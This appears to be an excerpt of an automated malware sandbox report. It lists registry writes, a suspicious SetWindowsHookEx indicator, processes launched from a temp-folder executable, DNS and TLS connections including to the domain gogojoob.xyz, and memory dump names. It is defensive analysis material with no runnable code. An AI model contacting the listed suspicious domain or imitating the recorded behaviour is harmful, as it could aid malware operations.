Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\VersionManager C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\XqBTvE.exe

"C:\Users\Admin\AppData\Local\Temp\XqBTvE.exe"

C:\Program Files (x86)\Internet Explorer\ielowutil.exe

"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4940 CREDAT:17410 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 licensing.mp.microsoft.com udp
US 20.223.25.224:443 licensing.mp.microsoft.com tcp
US 8.8.8.8:53 storesdk.dsx.mp.microsoft.com udp
NL 104.80.225.205:443 storesdk.dsx.mp.microsoft.com tcp
US 20.223.25.224:443 licensing.mp.microsoft.com tcp
US 20.223.25.224:443 licensing.mp.microsoft.com tcp
US 20.223.25.224:443 licensing.mp.microsoft.com tcp
US 8.8.8.8:53 gogojoob.xyz udp
NL 194.104.136.213:443 gogojoob.xyz tcp

Files

memory/3652-134-0x00000000004CD000-0x00000000004D9000-memory.dmp

memory/3652-135-0x00000000004CD000-0x00000000004D9000-memory.dmp

memory/3652-136-0x0000000000D20000-0x0000000000D2C000-memory.dmp

memory/3652-137-0x0000000001000000-0x000000000106F000-memory.dmp

memory/3652-138-0x0000000000D30000-0x0000000000D40000-memory.dmp